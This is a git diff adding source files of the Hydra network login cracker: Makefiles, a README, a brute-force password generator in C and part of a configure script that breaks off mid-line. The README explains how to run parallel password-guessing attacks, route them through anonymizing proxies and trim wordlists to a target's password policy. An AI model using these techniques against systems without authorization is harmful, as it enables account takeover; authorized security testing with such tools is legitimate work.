a/Makefile.am b/Makefile.am new file mode 100644 index 0000000..89fb354 --- /dev/null +++ b/Makefile.am @@ -0,0 +1,73 @@ +# +# Makefile for Hydra - (c) 2001-2014 by van Hauser / THC +# +OPTS=-I. -O3 +# -Wall -g -pedantic +LIBS=-lm +DIR=/bin + +SRC = hydra-vnc.c hydra-pcnfs.c hydra-rexec.c hydra-nntp.c hydra-socks5.c \ + hydra-telnet.c hydra-cisco.c hydra-http.c hydra-ftp.c hydra-imap.c \ + hydra-pop3.c hydra-smb.c hydra-icq.c hydra-cisco-enable.c hydra-ldap.c \ + hydra-mysql.c hydra-mssql.c hydra-xmpp.c hydra-http-proxy-urlenum.c \ + hydra-snmp.c hydra-cvs.c hydra-smtp.c hydra-smtp-enum.c hydra-sapr3.c hydra-ssh.c \ + hydra-sshkey.c hydra-teamspeak.c hydra-postgres.c hydra-rsh.c hydra-rlogin.c \ + hydra-oracle-listener.c hydra-svn.c hydra-pcanywhere.c hydra-sip.c \ + hydra-oracle.c hydra-vmauthd.c hydra-asterisk.c hydra-firebird.c hydra-afp.c hydra-ncp.c \ + hydra-oracle-sid.c hydra-http-proxy.c hydra-http-form.c hydra-irc.c \ + hydra-rdp.c hydra-s7-300.c hydra-redis.c \ + crc32.c d3des.c bfg.c ntlm.c sasl.c hmacmd5.c hydra-mod.c +OBJ = hydra-vnc.o hydra-pcnfs.o hydra-rexec.o hydra-nntp.o hydra-socks5.o \ + hydra-telnet.o hydra-cisco.o hydra-http.o hydra-ftp.o hydra-imap.o \ + hydra-pop3.o hydra-smb.o hydra-icq.o hydra-cisco-enable.o hydra-ldap.o \ + hydra-mysql.o hydra-mssql.o hydra-xmpp.o hydra-http-proxy-urlenum.o \ + hydra-snmp.o hydra-cvs.o hydra-smtp.o hydra-smtp-enum.o hydra-sapr3.o hydra-ssh.o \ + hydra-sshkey.o hydra-teamspeak.o hydra-postgres.o hydra-rsh.o hydra-rlogin.o \ + hydra-oracle-listener.o hydra-svn.o hydra-pcanywhere.o hydra-sip.o \ + hydra-oracle-sid.o hydra-oracle.o hydra-vmauthd.o hydra-asterisk.o hydra-firebird.o hydra-afp.o hydra-ncp.o \ + hydra-http-proxy.o hydra-http-form.o hydra-irc.o hydra-redis.o \ + hydra-rdp.o hydra-s7-300.c \ + crc32.o d3des.o bfg.o ntlm.o sasl.o hmacmd5.o hydra-mod.o +BINS = hydra pw-inspector + +EXTRA_DIST = README README.arm README.palm CHANGES TODO INSTALL LICENSE \ + hydra-mod.h hydra.h crc32.h d3des.h + +all: pw-inspector hydra $(XHYDRA_SUPPORT) + @echo + @echo Now type "make install" + +hydra: hydra.c $(OBJ) + $(CC) $(OPTS) $(SEC) $(LIBS) $(CFLAGS) $(CPPFLAGS) $(LDFLAGS) -o hydra $(HYDRA_LOGO) hydra.c $(OBJ) $(LIBS) $(XLIBS) $(XLIBPATHS) $(XIPATHS) $(XDEFINES) + @echo + @echo If men could get pregnant, abortion would be a sacrament + @echo + +xhydra: + -cd hydra-gtk && sh ./make_xhydra.sh + +pw-inspector: pw-inspector.c + -$(CC) $(OPTS) $(SEC) $(CFLAGS) $(CPPFLAGS) $(LDFLAGS) -o pw-inspector $(PWI_LOGO) pw-inspector.c + +.c.o: + $(CC) $(OPTS) $(SEC) $(CFLAGS) $(CPPFLAGS) -c $< $(XDEFINES) $(XIPATHS) + +strip: all + strip $(BINS) + -echo OK > /dev/null && test -x xhydra && strip xhydra || echo OK > /dev/null + +install: strip + -mkdir -p $(PREFIX)$(DIR) + cp -f hydra-wizard.sh $(BINS) $(PREFIX)$(DIR) && cd $(PREFIX)$(DIR) && chmod 755 hydra-wizard.sh $(BINS) + -echo OK > /dev/null && test -x xhydra && cp xhydra $(PREFIX)$(DIR) && cd $(PREFIX)$(DIR) && chmod 755 xhydra || echo OK > /dev/null + -sed -e "s|^INSTALLDIR=.*|INSTALLDIR="$(PREFIX)"|" dpl4hydra.sh > $(PREFIX)/bin/dpl4hydra.sh + -chmod 755 $(PREFIX)/bin/dpl4hydra.sh + -mkdir -p $(PREFIX)/etc/ + -cp -f *.csv $(PREFIX)/etc/ + -mkdir -p $(PREFIX)/man/man1 + -cp -f hydra.1 xhydra.1 pw-inspector.1 $(PREFIX)/man/man1 + +clean: + rm -rf xhydra pw-inspector hydra *.o core *.core *.stackdump *~ Makefile.in Makefile dev_rfc hydra.restore arm/*.ipk arm/ipkg/usr/bin/* hydra-gtk/src/*.o hydra-gtk/src/xhydra hydra-gtk/stamp-h hydra-gtk/config.status hydra-gtk/errors hydra-gtk/config.log hydra-gtk/src/.deps hydra-gtk/src/Makefile hydra-gtk/Makefile + cp -f Makefile.orig Makefile + diff --git a/Makefile.orig b/Makefile.orig new file mode 100644 index 0000000..372e67e --- /dev/null +++ b/Makefile.orig @@ -0,0 +1,5 @@ +all: + @echo Error: you must run "./configure" first + +clean: + cp -f Makefile.orig Makefile diff --git a/Makefile.unix b/Makefile.unix new file mode 100644 index 0000000..d58d678 --- /dev/null +++ b/Makefile.unix @@ -0,0 +1,2 @@ +CC=gcc +STRIP=strip diff --git a/README b/README new file mode 100644 index 0000000..e97edd8 --- /dev/null +++ b/README @@ -0,0 +1,229 @@ + + H Y D R A + + (c) 2001-2014 by van Hauser / THC + http://www.thc.org + co-maintained by David (dot) Maciejak @ gmail (dot) com + BFG code by Jan Dlabal + + Licensed under AGPLv3 (see LICENSE file) + + + +INTRODUCTION +------------ +Number one of the biggest security holes are passwords, as every password +security study shows. +This tool is a proof of concept code, to give researchers and security +consultants the possiblity to show how easy it would be to gain unauthorized +access from remote to a system. + +THIS TOOL IS FOR LEGAL PURPOSES ONLY! + +There are already several login hacker tools available, however none does +either support more than one protocol to attack or support parallized +connects. + +It was tested to compile cleanly on Linux, Windows/Cygwin, Solaris, FreeBSD +and OSX. + +Currently this tool supports: + + Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, + HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, + HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, + MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, + PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, + SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, + Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP. + +However the module engine for new services is very easy so it won't take a +long time until even more services are supported. +Your help in writing, enhancing or fixing modules is highly appreciated!! :-) + + + +HOW TO COMPILE +-------------- +For hydra, just type: + +./configure +make +make install + +If you need ssh module support, you have to setup libssh on your system, +get it from http://www.libssh.org, for ssh v1 support you also need to add +"-DWITH_SSH1=On" option in the cmake command line. + +If you use Ubuntu, this will install supplementary libraries needed for a +few optional modules: + apt-get install libssl-dev libssh-dev libidn11-dev libpcre3-dev \ + libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev \ + firebird2.1-dev libncp-dev +This enables all optional modules and features with the exception of Oracle, +SAP R/3 and the apple filing protocol - which you will need to download and +install from the vendor's web sites. + +For all other Linux derivates and BSD based systems, use the system +software installer and look for similar named libraries like in the +comand above. In all other cases you have to download all source libraries +and compile them manually. + + + +SUPPORTED PLATFORMS +------------------- +All UNIX platforms (linux, *bsd, solaris, etc.) +Mac OS/X +Windows with Cygwin (both ipv4 and ipv6) +Mobile systems based on Linux or Mac OS/X (e.g. Android, iPhone, Zaurus, iPaq) + + + +HOW TO USE +---------- +Type "./configure", followed by "make" to compile hydra and then +"./hydra -h" to see the command line options. +You make also type "make install" to install hydra to /usr/local/bin. +Note that NO login/password file is included. Generate them yourself. +For Linux users, a GTK gui is available, try "./xhydra" + + + +SPECIAL OPTIONS FOR MODULES +--------------------------- +Via the third command line parameter (TARGET SERVICE OPTIONAL) or the -m +commandline option, you can pass one option to a module. +Many modules use this, a few require it! + +To see the special option of a module, type: + hydra -U +e.g. + ./hydra -U http-post-form + +The special options can be passed via the -m parameter, as 3rd command line +option or in the service://target/option format. + +Examples (they are all equal): + ./hydra -l test -p test -m PLAIN 127.0.0.1 imap + ./hydra -l test -p test 127.0.0.1 imap PLAIN + ./hydra -l test -p test imap://127.0.0.1/PLAIN + + + +RESTORING AN ABORTED/CRASHED SESSION +------------------------------------ +When hydra is aborted with Control-C, killed or crashs, it leavs a +"hydra.restore" file behind which contains all necessary information to +restore the session. This session file is written every 5 minutes. +NOTE: if you are cracking parallel hosts (-M option), this feature doesnt +work, and is therefore disabled! +NOTE: the hydra.restore file can NOT be copied to a different platform (e.g. +from little indian to big indian, or from solaris to aix) + + + +HOW TO SCAN/CRACK OVER A PROXY +------------------------------ +The environment variable HYDRA_PROXY_HTTP defines the web proxy (this works +just for the http/www service!). +The following syntax is valid: + HYDRA_PROXY_HTTP="http://123.45.67.89:8080/" +For all other services, use the HYDRA_PROXY variable to scan/crack +via by default a web proxy's CONNECT call. It uses the same syntax. eg: + HYDRA_PROXY=[http|socks4|socks5]://proxy_addr:proxy_port +for example: + HYDRA_PROXY=http://proxy.anonymizer.com:8000 + +If you require authentication for the proxy, use the HYDRA_PROXY_AUTH +environment variable: + HYDRA_PROXY_AUTH="the_login:the_password" + + + +ADDITIONAL HINTS +---------------- +* sort your password files by likelihood and use the -u option to find + passwords much faster! +* uniq your dictionary files! this can save you a lot of time :-) + cat words.txt | sort | uniq > dictionary.txt +* if you know that the target is using a password policy (allowing users + only to choose password with a minimum length of 6, containing a least one + letter and one number, etc. use the tool pw-inspector which comes along + with the hydra package to reduce the password list: + cat dictionary.txt | pw-inspector -m 6 -c 2 -n > passlist.txt + + + +SPEED +----- +through the parallizing feature, this password cracker tool can be very +fast, however it depends on the protocol. The fastest are generally POP3 +and FTP. +Experiment with the task option (-t) to speed things up! The higher - the +faster ;-) (but too high - and it disables the service) + + + +STATISTICS +---------- +Run against a SuSE Linux 7.2 on localhost with a "-C FILE" containing +295 entries (294 tries invalid logins, 1 valid). Every test was run three +times (only for "1 task" just once), and the average noted down. + + P A R A L L E L T A S K S +SERVICE 1 4 8 16 32 50 64 100 128 +------- -------------------------------------------------------------------- +telnet 23:20 5:58 2:58 1:34 1:05 0:33 0:45* 0:25* 0:55* +ftp 45:54 11:51 5:54 3:06 1:25 0:58 0:46 0:29 0:32 +pop3 92:10 27:16 13:56 6:42 2:55 1:57 1:24 1:14 0:50 +imap 31:05 7:41 3:51 1:58 1:01 0:39 0:32 0:25 0:21 + +(*) +Note: telnet timings can be VERY different for 64 to 128 tasks! e.g. with +128 tasks, running four times resulted in timings between 28 and 97 seconds! +The reason for this is unknown... + +guesses per task (rounded up): + 295 74 38 19 10 6 5 3 3 + +guesses possible per connect (depends on the server software and config): + telnet 4 + ftp 6 + pop3 1 + imap 3 + + + +BUGS & FEATURES +--------------- +Hydra: +Email me or David if you find bugs or if you have written a new module. +vh@thc.org (and put "antispam" in the subject line) +David (dot) Maciejak @ gmail (dot) com + + +Type Bits/KeyID Date User ID +pub 2048/CDD6A571 1998/04/27 van Hauser / THC + +-----BEGIN PGP PUBLIC KEY BLOCK----- +Version: 2.6.3i + +mQENAzVE0A4AAAEIAOzKPhKBDFDyeTvMKQ1xx6781tEdIYgrkrsUEL6VoJ8H8CIU +SeXDuCVu3JlMKITD6nPMFJ/DT0iKHgnHUZGdCQEk/b1YHUYOcig1DPGsg3WeTX7L +XL1M4DwqDvPz5QUQ+U+VHuNOUzgxfcjhHsjJj2qorVZ/T5x4k3U960CMJ11eOVNC +meD/+c6a2FfLZJG0sJ/kIZ9HUkY/dvXDInOJaalQc1mYjkvfcPsSzas4ddiXiDyc +QcKX+HAXIdmT7bjq5+JS6yspnBvIZC55tB7ci2axTjwpkdzJBZIkCoBlWsDXNwyq +s70Lo3H9dcaNt4ubz5OMVIvJHFMCEtIGS83WpXEABRG0J3ZhbiBIYXVzZXIgLyBU +SEMgPHZoQHJlcHRpbGUucnVnLmFjLmJlPokAlQMFEDVE0D7Kb9wCOxiMfQEBvpAD +/3UCDgJs1CNg/zpLhRuUBlYsZ1kimb9cbB/ufL1I4lYM5WMyw+YfGN0p02oY4pVn +CQN6ca5OsqeXHWfn7LxBT3lXEPCckd+vb9LPPCzuDPS/zYnOkUXgUQdPo69B04dl +C9C1YXcZjplYso2q3NYnuc0lu7WVD0qT52snNUDkd19ciQEVAwUQNUTQDhLSBkvN +1qVxAQGRTwgA05OmurXHVByFcvDaBRMhX6pKbTiVKh8HdJa8IdvuqHOcYFZ2L+xZ +PAQy2WCqeakvss9Xn9I28/PQZ+6TmqWUmG0qgxe5MwkaXWxszKwRsQ8hH+bcppsZ +2/Q3BxSfPege4PPwFWsajnymsnmhdVvvrt69grzJDm+iMK0WR33+RvtgjUj+i22X +lpt5hLHufDatQzukMu4R84M1tbGnUCNF0wICrU4U503yCA4DT/1eMoDXI0BQXmM/ +Ygk9bO2Icy+lw1WPodrWmg4TJhdIgxuYlNLIu6TyqDYxjA/c525cBbdqwoE+YvUI +o7CN/bJN0bKg1Y/BMTHEK3mpRLLWxVMRYw== +=MdzX +-----END PGP PUBLIC KEY BLOCK----- diff --git a/bfg.c b/bfg.c new file mode 100644 index 0000000..985696e --- /dev/null +++ b/bfg.c @@ -0,0 +1,204 @@ + +/* code original by Jan Dlabal , partially rewritten by vh */ + +#include +#include +#include +#include +#include +#include "bfg.h" + +bf_option bf_options; + +#ifdef HAVE_MATH_H + +extern int debug; + +// return values : 0 on success, 1 on error +// +// note that we check for -x .:.:ab but not for -x .:.:ba +// +int bf_init(char *arg) { + int i = 0; + int crs_len = 0; + char flags = 0; + char *tmp = strchr(arg, ':'); + + if (!tmp) { + fprintf(stderr, "Error: Invalid option format for -x\n"); + return 1; + } else { + tmp[0] = '\0'; + } + bf_options.from = atoi(arg); + if (bf_options.from < 1 || bf_options.from > 127) { + fprintf(stderr, "Error: minimum length must be between 1 and 127, format: -x min:max:types\n"); + return 1; + } + arg = tmp + 1; + tmp++; + if (!arg[0]) { + fprintf(stderr, "Error: no maximum length specified for -x min:max:types!\n"); + return 1; + } + tmp = strchr(arg, ':'); + if (!tmp) { + fprintf(stderr, "Error: Invalid option format for -x\n"); + return 1; + } else { + tmp[0] = '\0'; + } + bf_options.to = atoi(arg); + tmp++; + + if (bf_options.from > bf_options.to) { + fprintf(stderr, "Error: you specified a minimum length higher than the maximum length!\n"); + return 1; + } + + if (tmp[0] == 0) { + fprintf(stderr, "Error: charset not specified!\n"); + return 1; + } + bf_options.crs = malloc(sizeof(char) * BF_CHARSMAX); + + if (bf_options.crs == NULL) { + fprintf(stderr, "Error: can't allocate enough memory!\n"); + return 1; + } + bf_options.crs[0] = 0; + + for (; tmp[i]; i++) { + switch (tmp[i]) { + case 'a': + crs_len += 26; + if (BF_CHARSMAX - crs_len < 1) { + free(bf_options.crs); + fprintf(stderr, "Error: charset specification exceeds %d characters.\n", BF_CHARSMAX); + return 1; + } else if (flags & BF_LOWER) { + free(bf_options.crs); + fprintf(stderr, "Error: 'a' specified more than once in charset!\n"); + return 1; + } else { + strcat(bf_options.crs, "abcdefghijklmnopqrstuvwxyz"); + flags |= BF_LOWER; + } + break; + + case 'A': + crs_len += 26; + if (BF_CHARSMAX - crs_len < 1) { + free(bf_options.crs); + fprintf(stderr, "Error: charset specification exceeds %d characters.\n", BF_CHARSMAX); + return 1; + } else if (flags & BF_UPPER) { + free(bf_options.crs); + fprintf(stderr, "Error: 'A' specified more than once in charset!\n"); + return 1; + } else { + strcat(bf_options.crs, "ABCDEFGHIJKLMNOPQRSTUVWXYZ"); + flags |= BF_UPPER; + } + break; + + case '1': + crs_len += 10; + if (BF_CHARSMAX - crs_len < 1) { + free(bf_options.crs); + fprintf(stderr, "Error: charset specification exceeds %d characters.\n", BF_CHARSMAX); + return 1; + } else if (flags & BF_NUMS) { + free(bf_options.crs); + fprintf(stderr, "Error: '1' specified more than once in charset!\n"); + return 1; + } else { + strcat(bf_options.crs, "0123456789"); + flags |= BF_NUMS; + } + break; + + default: + if ((tmp[i] >= '2' && tmp[i] <= '9') || tmp[i] == '0') { + if ((flags & BF_NUMS) > 0) { + printf("[ERROR] character %c defined in -x although the whole number range was already defined by '1', ignored\n", tmp[i]); + continue; + } + printf("[WARNING] adding character %c for -x, note that '1' will add all numbers from 0-9\n", tmp[i]); + } + if (tolower((int) tmp[i]) >= 'b' && tolower((int) tmp[i]) <= 'z') { + if ((tmp[i] <= 'Z' && (flags & BF_UPPER) > 0) || (tmp[i] > 'Z' && (flags & BF_UPPER) > 0)) { + printf("[ERROR] character %c defined in -x although the whole letter range was already defined by '%c', ignored\n", tmp[i], tmp[i] <= 'Z' ? 'A' : 'a'); + continue; + } + printf("[WARNING] adding character %c for -x, note that '%c' will add all %scase letters\n", tmp[i], tmp[i] <= 'Z' ? 'A' : 'a', tmp[i] <= 'Z' ? "up" : "low"); + } + crs_len++; + if (BF_CHARSMAX - crs_len < 1) { + free(bf_options.crs); + fprintf(stderr, "Error: charset specification exceeds %d characters.\n", BF_CHARSMAX); + return 1; + } else { + bf_options.crs[crs_len - 1] = tmp[i]; + bf_options.crs[crs_len] = '\0'; + } + break; + } + } + + bf_options.crs_len = crs_len; + bf_options.current = bf_options.from; + memset((char *) bf_options.state, 0, sizeof(bf_options.state)); + if (debug) + printf("[DEBUG] bfg INIT: from %d, to %d, len: %d, set: %s\n", bf_options.from, bf_options.to, bf_options.crs_len, bf_options.crs); + + return 0; +} + + +unsigned long int bf_get_pcount() { + int i; + unsigned long int count = 0; + + for (i = bf_options.from; i <= bf_options.to; i++) + count += (unsigned long int) (pow((float) bf_options.crs_len, (float) i)); + return count; +} + + +char *bf_next() { + int i, pos = bf_options.current - 1; + + if (bf_options.current > bf_options.to) + return NULL; // we are done + + if ((bf_options.ptr = malloc(BF_CHARSMAX)) == NULL) { + fprintf(stderr, "Error: Can not allocate memory for -x data!\n"); + return NULL; + } + + for (i = 0; i < bf_options.current; i++) + bf_options.ptr[i] = bf_options.crs[bf_options.state[i]]; + bf_options.ptr[bf_options.current] = 0; + + if (debug) { + printf("[DEBUG] bfg IN: len %d, from %d, current %d, to %d, state:", bf_options.crs_len, bf_options.from, bf_options.current, bf_options.to); + for (i = 0; i < bf_options.current; i++) + printf(" %d", bf_options.state[i]); + printf(", x: %s\n", bf_options.ptr); + } + + while (pos >= 0 && (++bf_options.state[pos]) >= bf_options.crs_len) { + bf_options.state[pos] = 0; + pos--; + } + + if (pos < 0) { + bf_options.current++; + memset((char *) bf_options.state, 0, sizeof(bf_options.state)); + } + + return bf_options.ptr; +} + +#endif diff --git a/bfg.h b/bfg.h new file mode 100644 index 0000000..8b544ac --- /dev/null +++ b/bfg.h @@ -0,0 +1,53 @@ +/* (c) 2008 Jan Dlabal */ +/* */ +/* This file is part of the bfg. */ +/* */ +/* bfgen is free software: you can redistribute it and/or modify */ +/* it under the terms of the GNU General Public License as published by */ +/* the Free Software Foundation, either version 3 of the License, or */ +/* any later version. */ +/* */ +/* bfgen is distributed in the hope that it will be useful, */ +/* but WITHOUT ANY WARRANTY; without even the implied warranty of */ +/* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the */ +/* GNU General Public License for more details. */ +/* */ +/* You should have received a copy of the GNU General Public License */ +/* along with bfgen. If not, see . */ + +#ifndef BF_H +#define BF_H + +#define BF_NAME "bfg" +#define BF_VERSION "v0.3" +#define BF_YEAR "2009" +#define BF_WEBSITE "http://houbysoft.com/bfg/" + +#define BF_BUFLEN 1024 +#define BF_CHARSMAX 256 /* how many max possibilities there are for characters, normally it's 2^8 = 256 */ + +#define BF_LOWER 1 +#define BF_UPPER 2 +#define BF_NUMS 4 + +typedef struct { + unsigned char from; + unsigned char to; + unsigned char current; + unsigned char state[BF_CHARSMAX]; /* which position has which character */ + unsigned char pos; /* where in current string length is the position */ + unsigned char crs_len; /* length of selected charset */ + char *arg; /* argument received for bfg commandline option */ + char *crs; /* internal representation of charset */ + char *ptr; /* ptr to the last generated password */ +} bf_option; + +extern bf_option bf_options; + +#ifdef HAVE_MATH_H +extern unsigned long int bf_get_pcount(); +extern int bf_init(char *arg); +extern char *bf_next(); +#endif + +#endif diff --git a/configure b/configure new file mode 100755 index 0000000..9ba9ebb --- /dev/null +++ b/configure @@ -0,0 +1,1064 @@ +#!/bin/sh +# +# uname -s = Linux | OpenBSD | FreeBSD +# uname -m = i636 or x86_64 + +if [ "$1" = "-h" ]; then + echo Options: + echo " --prefix=path path to install hydra and its datafiles to" + echo " --with-oracle=prefix prefix for oracle include dir" + echo " --with-oracle-lib=prefix prefix for oracle lib dir" + echo " --disable-xhydra disable compilation of hydra GUI" + echo " --nostrip do not per default strip binaries before install" + echo " --help this here" + exit 0 +fi +if [ "$1" = "--help" ]; then + echo Options: + echo " --prefix=path path to install hydra and its datafiles to" + echo " --with-oracle=prefix prefix for oracle include dir" + echo " --with-oracle-lib=prefix prefix for oracle lib dir" + echo " --disable-xhydra disable compilation of hydra GUI" + echo " --nostrip do not per default strip binaries before install" + echo " --help this here" + exit 0 +fi + +echo +echo "Starting hydra auto configuration ..." +rm -f Makefile.in +SYSS=`uname -s 2> /dev/null` +SYSO=`uname -o 2> /dev/null` +SIXFOUR="" +if [ "$SYSS" = "Linux" -o "$SYSS" = "OpenBSD" -o "$SYSS" = "FreeBSD" -o "$SYSS" = "NetBSD" ]; then + SF=`uname -m | grep 64` + if [ `uname -m` = "s390x" ]; then + SF=64 + fi + if [ "x$SF" = "x" ]; then + SIXFOUR="" + echo Detected 32 Bit $SYSS OS + else + SIXFOUR=64 + echo Detected 64 Bit $SYSS OS + fi +fi +PREFIX="" +NOSTRIP="" +ORACLE_PATH="" +ORACLE_IPATH="" +WORACLE_PATH="" +WORACLE_LIB_PATH="" +SSL_PATH="" +SSL_IPATH="" +CURSES_PATH="" +CURSES_IPATH="" +CRYPTO_PATH="" +IDN_PATH="" +IDN_IPATH="" +PR29_IPATH="" +PCRE_PATH="" +PCRE_IPATH="" +POSTGRES_PATH="" +FIREBIRD_PATH="" +FIREBIRD_IPATH="" +MYSQL_PATH="" +MYSQL_IPATH="" +AFP_PATH="" +AFP_IPATH="" +NCP_PATH="" +NCP_IPATH="" +SVN_PATH="" +SVN_IPATH="" +APR_IPATH="" +SAPR3_PATH="" +SAPR3_IPATH="" +SSH_PATH="" +SSH_IPATH="" +NSL_PATH="" +SOCKET_PATH="" +MANDIR="" +XHYDRA_SUPPORT="" +LIBDIRS=`cat /etc/ld.so.conf /etc/ld.so.conf.d/* 2> /dev/null | grep -v '^#' | sort | uniq` +if [ "$SIXFOUR" = "64" ]; then + LIBDIRS="$LIBDIRS /lib64 /usr/lib64 /usr/local/lib64 /opt/local/lib64" +fi +LIBDIRS="$LIBDIRS /lib /usr/lib /usr/local/lib /opt/local/lib" +INCDIRS="/usr/include /usr/local/include /opt/include /opt/local/include" +STRIP="strip" +echo + +echo "Checking for openssl (libssl, libcrypto, ssl.h, sha.h) ..." +for i in $LIBDIRS \ +/*ssl /usr/*ssl /opt/*ssl /usr/local/*ssl /opt/local/*ssl \ +/*ssl/lib /usr/*ssl/lib /opt/*ssl/lib /usr/local/*ssl/lib /opt/local/*ssl/lib +do + if [ "X" = "X$SSL_PATH" ]; then + if [ -f "$i/libssl.so" -o -f "$i/libssl.dylib" -o -f "$i/libssl.a" ]; then + SSL_PATH="$i" + fi + fi + if [ "X" = "X$SSL_PATH" ]; then + TMP_LIB=`/bin/ls $i/libssl.so* /bin/cygssl*.dll 2> /dev/null | grep ssl` + if [ -n "$TMP_LIB" ]; then + SSL_PATH="$i" + fi + fi + if [ "X" = "X$CRYPTO_PATH" ]; then + if [ -f "$i/libcrypto.so" -o -f "$i/libcrypto.dylib" -o -f "$i/libcrypto.a" ]; then + CRYPTO_PATH="$i" + fi + fi + if [ "X" = "X$CRYPTO_PATH" ]; then + TMP_LIB=`/bin/ls $i/libcrypto.so* /bin/cygcrypto*.dll 2> /dev/null | grep crypto` + if [ -n "$TMP_LIB" ]; then + CRYPTO_PATH="$i" + fi + fi +done + +SSLNEW="" +for i in $INCDIRS /*ssl/include /opt/*ssl/include /usr/*ssl/include /usr/local/*ssl/include +do + if [ "X" = "X$SSL_IPATH" ]; then + if [ -f "$i/openssl/ssl.h" ]; then + SSL_IPATH="$i" + SSLNEW=`grep SHA256_CTX $i/openssl/sha.h 2> /dev/null` + fi + fi +done + +if [ "X" = "X$SSL_PATH" ]; then + SSL_IPATH="" + CRYPTO_PATH="" +fi +if [ "X" = "X$SSL_IPATH" ]; then + SSL_PATH="" + CRYPTO_PATH="" +fi +if [ -n "$SSL_PATH" -a "X" = "X$SSLNEW" ]; then + echo " ... found but OLD" + echo "NOTE: your OpenSSL package is outdated, update it!" +fi +if [ -n "$SSL_PATH" -a '!' "X" = "X$SSLNEW" ]; then + echo " ... found" +fi +if [ "X" = "X$SSL_PATH" ]; then + echo " ... NOT found, SSL support disabled" + echo "Get it from http://www.openssl.org" +fi +if [ "$SSL_IPATH" = "/usr/include" ]; then + SSL_IPATH="" +fi + +echo "Checking for idn (libidn.so) ..." +for i in $LIBDIRS ; do + if [ "X" = "X$IDN_PATH" ]; then + if [ -f "$i/libidn.so" -o -f "$i/libidn.dylib" -o -f "$i/libidn.a" -o -f "$i/libidn.dll.a" -o -f "$i/libidn.la" ]; then + IDN_PATH="$i" + fi + fi + if [ "X" = "X$IDN_PATH" ]; then + TMP_LIB=`/bin/ls $i/libidn.so* /bin/libidn*.dll 2> /dev/null | grep ssl` + if [ -n "$TMP_LIB" ]; then + IDN_PATH="$i" + fi + fi +done +for i in $INCDIRS ; do + if [ "X" != "X$IDN_PATH" ]; then + if [ -f "$i/stringprep.h" ]; then + IDN_IPATH="$i" + fi + fi + if [ "X" != "X$IDN_PATH" ]; then + if [ -f "$i/pr29.h" ]; then + PR29_IPATH="$i" + fi + fi +done +if [ -n "$IDN_PATH" -a -n "$IDN_IPATH" ]; then + echo " ... found" +fi +#pr29 is optional +if [ "X" = "X$IDN_PATH" -o "X" = "X$IDN_IPATH" ]; then + echo " ... NOT found, unicode logins and passwords will not be supported" + IDN_PATH="" + IDN_IPATH="" + PR29_IPATH="" +fi + +echo "Checking for curses (libcurses.so / term.h) ..." +for i in $LIBDIRS; do + if [ "X" = "X$CURSES_PATH" ]; then + if [ -f "$i/libcurses.so" -o -f "$i/libcurses.dylib" -o -f "$i/libcurses.a" ]; then + CURSES_PATH="$i" + fi + fi + if [ "X" = "X$CURSES_PATH" ]; then + TMP_LIB=`/bin/ls $i/libcurses.so.* 2> /dev/null | grep curses.` + if [ -n "$TMP_LIB" ]; then + CURSES_PATH="$i" + fi + fi + if [ "X" = "X$CURSES_PATH" ]; then + TMP_LIB=`/bin/ls $i/libcurses.dll* 2> /dev/null | grep curses.` + if [ -n "$TMP_LIB" ]; then + CURSES_PATH="$i" + fi + fi +done +for i in $INCDIRS ; do + if [ "X" != "X$CURSES_PATH" ]; then + if [ -f "$i/term.h" ]; then + CURSES_IPATH="$i" + fi + if [ -f "$i/ncurses/term.h" ]; then + CURSES_IPATH="$i/ncurses" + fi + fi +done +if [ -n "$CURSES_PATH" -a -n "$CURSES_IPATH" ]; then + echo " ... found, color output enabled" +fi +if [ "X" = "X$CURSES_PATH" -o "X" = "X$CURSES_IPATH" ]; then + echo " ... NOT found, color output disabled" + CURSES_PATH="" + CURSES_IPATH="" +fi + +echo "Checking for pcre (libpcre.so, pcre.h) ..." +for i in $LIBDIRS ; do + if [ "X" = "X$PCRE_PATH" ]; then + if [ -f "$i/libpcre.so" -o -f "$i/libpcre.dylib" -o -f "$i/libpcre.a" ]; then + PCRE_PATH="$i" + fi + fi + if [ "X" = "X$PCRE_PATH" ]; then + TMP_LIB=`/bin/ls $i/libpcre.so* 2> /dev/null | grep libpcre.` + if [ -n "$TMP_LIB" ]; then + PCRE_PATH="$i" + fi + fi + if [ "X" = "X$PCRE_PATH" ]; then + TMP_LIB=`/bin/ls $i/libpcre.dll* 2> /dev/null | grep libpcre.` + if [ -n "$TMP_LIB" ]; then + PCRE_PATH="$i" + fi + fi +done +for i in $INCDIRS ; do + if [ "X" != "X$PCRE_PATH" ]; then + if [ -f "$i/pcre.h" ]; then + PCRE_IPATH="$i" + fi + fi +done +if [ -n "$PCRE_PATH" -a -n "$PCRE_IPATH" ]; then + echo " ... found" +fi +if [ "X" = "X$PCRE_PATH" -o "X" = "X$PCRE_IPATH" ]; then + echo " ... NOT found, server response checks will be less reliable" + PCRE_PATH="" + PCRE_IPATH="" +fi + +echo "Checking for Postgres (libpq.so, libpq-fe.h) ..." +#if [ "$SYSO" = "Cygwin" ]; then +# echo " ... DISABLED - postgres is buggy in Cygwin at the moment" +# POSTGRES_PATH="" +# POSTGRES_IPATH="" +#else + for i in $LIBDIRS ; do + if [ "X" = "X$POSTGRES_PATH" ]; then + if [ -f "$i/libpq.so" -o -f "$i/libpq.dylib" -o -f "$i/libpq.a" ]; then + POSTGRES_PATH="$i" + fi + fi + if [ "X" = "X$POSTGRES_PATH" ]; then + TMP_LIB=`/bin/ls $i/libpq.so* 2> /dev/null | grep pq` + if [ -n "$TMP_LIB" ]; then + POSTGRES_PATH="$i" + fi + fi + if [ "X" = "X$POSTGRES_PATH" ]; then + TMP_LIB=`/bin/ls $i/libpq.dll* 2> /dev/null | grep pq` + if [ -n "$TMP_LIB" ]; then + POSTGRES_PATH="$i" + fi + fi + done + POSTGRES_IPATH= + for i in $INCDIRS \ + /opt/p*sql*/include /usr/*p*sql*/include /usr/local/*psql*/include + do + if [ "X" = 